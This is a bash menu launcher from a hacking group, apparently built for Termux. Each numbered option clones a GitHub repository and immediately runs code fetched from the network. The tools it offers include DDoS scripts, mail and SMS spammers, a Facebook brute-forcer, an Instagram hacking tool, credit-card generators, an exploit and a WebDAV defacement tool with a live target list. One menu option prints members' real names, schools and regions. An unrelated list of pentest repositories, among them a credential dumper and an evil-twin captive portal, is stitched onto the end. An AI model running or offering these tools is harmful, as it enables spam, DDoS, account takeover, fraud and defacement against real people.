echo $cy"[45]" $ku"FbBot |" echo $cy"[46]" $pu"YtSub |" echo $pu"───────────────────────────────────────────" echo $me" I.T.A×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[47]" $ku"TOOLINSTALLERv1 |" echo $cy"[48]" $pu"TOOLINSTALLERv2 |" echo $cy"[49]" $me"TOOLINSTALLERv3 |" echo $cy"[50]" $pr"TOOLINSTALLERv4 |" echo $cy"[51]" $ij"DIR |" echo $cy"[52]" $bi"REVERSEIP |" echo $cy"[53]" $or"TRACKIP |" echo $cy"[54]" $ku"DNSLOOKUP |" echo $cy"[55]" $pu"WHOIS |" echo $cy"[56]" $me"REVESEDNS |" echo $cy"[57]" $pr"WEBDAV |" echo $cy"[58]" $ij"DIRHUNT |" echo $cy"[59]" $bi"SUBDO |" echo $cy"[60]" $or"HTTPHEADERS |" echo $cy"[61]" $ku"YOUTUBE-DOWNLOADER |" echo $cy"[62]" $pu"ADLOG (ADMIN LOGIN) |" echo $cy"[63]" $me"JADWAL-SHOLAT |" echo $cy"[64]" $pr"TOOLKIT |" echo $cy"[65]" $ij"BASH-ENCRYPT |" echo $cy"[66]" $bi"ENCRYPT-PYTHON |" echo $cy"[67]" $or"Facebook-BruteForce |" echo $cy"[68]" $ku"VULNSCANNING |" echo $cy"[69]" $pu"SHORTENERLINKS |" echo $cy"[70]" $me"PERKIRAANCUACA |" echo $cy"[71]" $pr"ARITMATIKA |" echo $pu"───────────────────────────────────────────" echo $me" Black Coder Crush×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[72]" $ku"Shortlink |" echo $cy"[73]" $pu"404GitHub |" echo $cy"[74]" $me"X-Caping |" echo $cy"[75]" $pr"ScriptCreator |" echo $cy"[76]" $ij"LinkChatGen |" echo $cy"[77]" $bi"BulkMailSpam |" echo $cy"[78]" $or"BinCon |" echo $cy"[79]" $ku"DfvAscii |" echo $cy"[80]" $pu"DfvXploit |" echo $pu"───────────────────────────────────────────" echo $me" BlackWare Coders Team×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[81]" $ku"Dorking |" echo $cy"[82]" $pu"Scanning |" echo $cy"[83]" $me"Reverse-Ip |" echo $cy"[84]" $pr"CBT-Vuln-Scanner |" echo $pu"───────────────────────────────────────────" echo $me" INSTALL BAHANNYA DULU GAN" echo $pu"───────────────────────────────────────────" echo $cy"[99]" $or"PILIH AKU SENPAI😍😍" echo $pu"───────────────────────────────────────────" echo $me"┌==="$bi"["$i"Mr.Astra code"$bi"]"$me"======"$bi"["$i""SELECT THE NUMBER""$bi"]" echo $me"¦" read -p"└──# " kaex if [ $kaex = 1 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/SPAM-CALL cd SPAM-CALL bash CaLL.sh fi if [ $kaex = 2 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/YOUTUBE-DOWNLOADER cd YOUTUBE-DOWNLOADER python2 youtube.py fi if [ $kaex = 3 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/DORK-SCANNER cd DORK-SCANNER php scan.php fi if [ $kaex = 4 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/REV-IP cd REV-IP python3 rev.io fi if [ $kaex = 5 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/CHECK-IP cd CHECK-IP python2 checkip.py fi if [ $kaex = 6 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/INSTAHACK cd INSTAHACK python2 insta.py fi if [ $kaex = 7 ] then clear figlet -f slant "[PLEASE WAIT"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/AdminFinder cd AdminFinder python2 admin.py fi if [ $kaex = 8 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/DDoS cd DDoS python2 ddos.py fi if [ $kaex = 9 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/MD5-CRACKER cd MD5-CRACKER python2 md5.py fi if [ $kaex = 10 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/CAPING-BOT cd CAPING-BOT php bot.php fi if [ $kaex = 11 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/MAIL-SPAMMER cd MAIL-SPAMMER php mail.php fi if [ $kaex = 12 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Im3-Spammer cd Im3-Spammer php im3.php fi if [ $kaex = 13 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/CREATE-BOT-SSH cd CREATE-BOT-SSH python2 ssh.py fi if [ $kaex = 14 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/ghoul cd ghoul python3 ghoul.py fi if [ $kaex = 15 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/SQLI-Vuln-Checker cd SQLI-Vuln-Checker python3 sqli.py fi if [ $kaex = 16 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Wp-Scan cd Wp-Scan python2 auto.py fi if [ $kaex = 17 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/NAS cd NAS python3 sabyan.chan fi if [ $kaex = 18 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Mp4-Convert cd Mp4-Convert python2 tube.py fi if [ $kaex = 19 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Exploit-Lokomedia cd Exploit-Lokomedia python2 Loko.py fi if [ $kaex = 20 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/DDoS-With-Perl cd DDoS-With-Perl perl dos.pl fi if [ $kaex = 21 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Apkpure-Downloader cd Apkpure-Downloader pip2 install -r requirements.txt python2 apk.py fi if [ $kaex = 22 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/GitHub-Info cd GitHub-Info python3 github.py -h fi if [ $kaex = 23 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/PROXY-CHECKER cd PROXY-CHECKER python3 proxy.py fi if [ $kaex = 24 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/PenKEX cd PenKEX python2 PenKex.py fi if [ $kaex = 25 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Ysub-Checker cd Ysub-Checker php ysub.php fi if [ $kaex = 26 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Text-To-Hex cd Text-To-Hex python2 hextex.py fi if [ $kaex = 27 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Webdav-Apk mv -f Webdav-Apk /sdcard cd /sdcard/Webdav-Apk echo $cy"APLIKASI WEBDAV NYA ADA DI DIRECTORY SDCARD/INTERNAL KALIAN" sleep 9 ls fi if [ $kaex = 28 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Pentester cd Pentester python2 pentest.py fi if [ $kaex = 29 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/ASWPLOIT cd ASWPLOIT sh install.sh fi if [ $kaex = 30 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/InFoGa cd InFoGa python infoga.py fi if [ $kaex = 31 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/ParrotSec cd ParrotSec bash parrot.sh fi if [ $kaex = 32 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/grabgithub cd grabgithub bash github.sh fi if [ $kaex = 33 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/subfinder cd subfinder bash subdocheck.sh fi if [ $kaex = 34 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/rolispam cd rolispam bash rolispam.sh fi if [ $kaex = 35 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/mail-filter cd mail-filter bash filter.sh fi if [ $kaex = 36 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/adminscan cd adminscan bash admin.sh fi if [ $kaex = 37 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/Ipinfo cd Ipinfo bash ipinfo.sh fi if [ $kaex = 38 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/cardgen cd cardgen bash cc.sh fi if [ $kaex = 39 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/cardvalidator cd cardvalidator bash card.sh fi if [ $kaex = 40 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/bloggrab cd bloggrab bash bloggrab.sh fi if [ $kaex = 41 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/igstalker cd igstalker bash igstalker.sh fi if [ $kaex = 42 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/gpstrack cd gpstrack bash gpstrack.sh fi if [ $kaex = 43 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/urldecode cd urldecode bash urldecode.sh fi if [ $kaex = 44 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/checker cd checker bash yahoo.sh fi if [ $kaex = 45 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/fbbot cd fbbot bash bot.sh fi if [ $kaex = 46 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/ytsubs cd ytsubs bash ytsubs.sh fi if [ $kaex = 47 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv1 cd TOOLSINSTALLERv1 sh Tuanb4dut.sh fi if [ $kaex = 48 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv2 cd TOOLSINSTALLERv2 sh Tuanb4dut.sh fi if [ $kaex = 49 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv3 cd TOOLSINSTALLERv3 sh TUANB4DUT.sh fi if [ $kaex = 50 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv4 cd TOOLSINSTALLERv4 chmod +x TUANB4DUT..sh ./TUANB4DUT..sh fi if [ $kaex = 51 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/DIR cd DIR sh dir.sh fi if [ $kaex = 52 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/REVERSEIP sh REVERSEIP.sh fi if [ $kaex = 53 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TRACKIP cd TRACKIP sh TRACKIP.sh fi if [ $kaex = 54 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/DNSLOOKUP cd DNSLOOKUP sh DNSLOOKUP.sh fi if [ $kaex = 55 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/WHOIS cd WHOIS sh WHOIS.sh fi if [ $kaex = 56 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/REVERSEDNS cd REVERSEDNS sh REVERSEDNS.sh fi if [ $kaex = 57 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/WEBDAV cd WEBDAV echo $or"LIVE TARGET DEFACE POC WEBDAV" cat WebLiveTarget.txt sleep 7 sh webdav.sh fi if [ $kaex = 58 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/DIRHUNT cd DIRHUNT sh DIRHUNT.sh fi if [ $kaex = 59 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/SUBDO cd SUBDO sh subdo.sh fi if [ $kaex = 60 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/HTTPHEADERS cd HTTPHEADERS sh httpheaders.sh fi if [ $kaex = 61 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/YOUTUBE cd YOUTUBE sh install.sh chmod +x YOUTUBE.sh ./YOUTUBE.sh fi if [ $kaex = 62 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/ADLOG cd ADLOG python2 adlog.py fi if [ $kaex = 63 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/JADWALSHOLAT cd JADWALSHOLAT sh jadwal.sh fi if [ $kaex = 64 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLKIT cd TOOLKIT sh TUANB4DUT.sh fi if [ $kaex = 65 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/BASH-ENCRYPT cd BASH-ENCRYPT sh setup.sh sh encrypt.sh fi if [ $kaex = 66 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/ENCRYPT-PYTHON cd ENCRYPT-PYTHON python2 compile.py fi if [ $kaex = 67 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/FACEBOOK-BRUTEFORCE cd FACEBOOK-BRUTEFORCE python2 bruteforce.py fi if [ $kaex = 68 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/VULNSCANNING cd VULNSCANNING python2 testvuln.py fi if [ $kaex = 69 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/SHORTNERLINKS cd SHORTNERLINKS sh URL.sh fi if [ $kaex = 70 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/PERKIRAAN-CUACA cd PERKIRAAN-CUACA sh CUACA.sh fi if [ $kaex = 71 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/ARITMATIKA cd ARITMATIKA sh aritmatika.sh fi if [ $kaex = 72 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/shortlink cd shortlink python2 shortlink.py fi if [ $kaex = 73 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/404Github cd 404Github python2 404Github.py fi if [ $kaex = 74 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/X-Caping cd X-Caping python2 Scaping.py fi if [ $kaex = 75 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/ScriptCreator cd ScriptCreator python2 Screator.py fi if [ $kaex = 76 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/LinkChatGen cd LinkChatGen sh chat.wa fi if [ $kaex = 77 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/BulkMailSpam cd BulkMailSpam python2 BulkMailSpam.py exit fi if [ $kaex = 78 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/BinCon cd BinCon pythob2 bin.con exit fi if [ $kaex = 79 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/DfvAscii cd DfvAscii sh dfv.ascii fi if [ $kaex = 80 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/DfvXploit cd DfvXploit pip install -r modul.txt python dfv.xploit fi if [ $kaex = 81 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/Dorking cd Dorking sh Dork.sh fi if [ $kaex = 82 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/scanning cd scanning sh vuln-scanner.sh fi if [ $kaex = 83 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/Reverse-Ip cd Reverse-Ip python2 github.py fi if [ $kaex = 84 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/CBT-Vuln_scanner cd CBT-Vuln_scanner python2 cbt-scanner.py fi if [ $kaex = 99 ] then clear pkg update && pkg upgrade pkg install git pkg install python2 && pkg install python pip2 install lolcat pip2 install requests pip2 install mechanize pip2 install dirhunt pip2 install youtube-dl pkg install curl pkg install php pip2 install termcolor pip2 install bs4 pip2 install beautifulsoup pip2 install colorama pkg install perl pkg install ruby pip install requests pkg install figlet fi if [ $kaex = 00 ] then clear echo $pu"───────────────────────────────────────────" echo $or"CEO" $ku"AND" $bi"FOUNDER" $ij"Kalsel" $pu"[" $pr"E" $pu"]" $cy"Xploit" echo $pu"───────────────────────────────────────────" echo $ij"CEO & FOUNDER" $or"Kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $cy"NAME : ARDHO AINULLAH" echo $or"CODENAME : MUH4K3M0S" echo $pu"SCHOOL : DARUSSALLAM" echo $ku"REGION : KALIMANTAN SELATAN" echo $pu"───────────────────────────────────────────" echo $ij"LEADER" $or"kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $or"NAME : MUHAMMAD RAFLI" echo $ij"CODENAME : IY×RafCode" echo $cy"SCHOOL : NURUL HIDAYAH" echo $ku"REGION : KALIMANTAN SELATAN" echo $pu"───────────────────────────────────────────" echo $ij"CO-LEADER" $or"kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $ku"NAME : M.WIDHI SATRIO" echo $ij"CODENAME : WIDHISEC" echo $pu"SCHOOL : ----" echo $cy"REGION : KALIMANTAN BARAT" echo $pu"───────────────────────────────────────────" echo $ij"ADMIN" $or"kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $pr"NAME : --------" echo $or"CODENAME : MR_MSDV" echo $pu"SCHOOL : -------" echo $ku"REGION : KALIMANTAN SELATAN" echo $pu"───────────────────────────────────────────"
e1abrador / Crackmapexec Custom ModulesCrackmapexec custom scripts used in my internal pentests.
Kiosec / Windows ExploitationAudit and pentest methodologies for Windows including internal enumeration, privesc, lateral movement, etc.
Viralmaniar / Reg HivesThis tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. Use it to copy SYSTEM, SECURITY and SAM hives and download them back to the attacker machines.
Kiosec / Linux ExploitationAudit and pentest methodologies for Linux including internal enumeration, privesc, lateral movement, etc.
neustarsabbir-max / ESP32 Evil Twin Captive PortalESP32 WiFi Pentesting tool: Scans networks, creates Evil Twin APs, and captures credentials to internal storage via Captive Portal
jurbz2019 / Internal Pentest PlaybookInternal Network Penetration Test Playbook
Vanessapan001 / Pentest 2 Initial Access And Internal ReconNo description available
jrmdev / BinderOrganise and access data collected during internal network pentests
KMGbully / HacksawUses a variety of open-source tools to automate initial testing on internal and external pentests, exports testing in txt, xml, and html formats, and parses outputs for findings.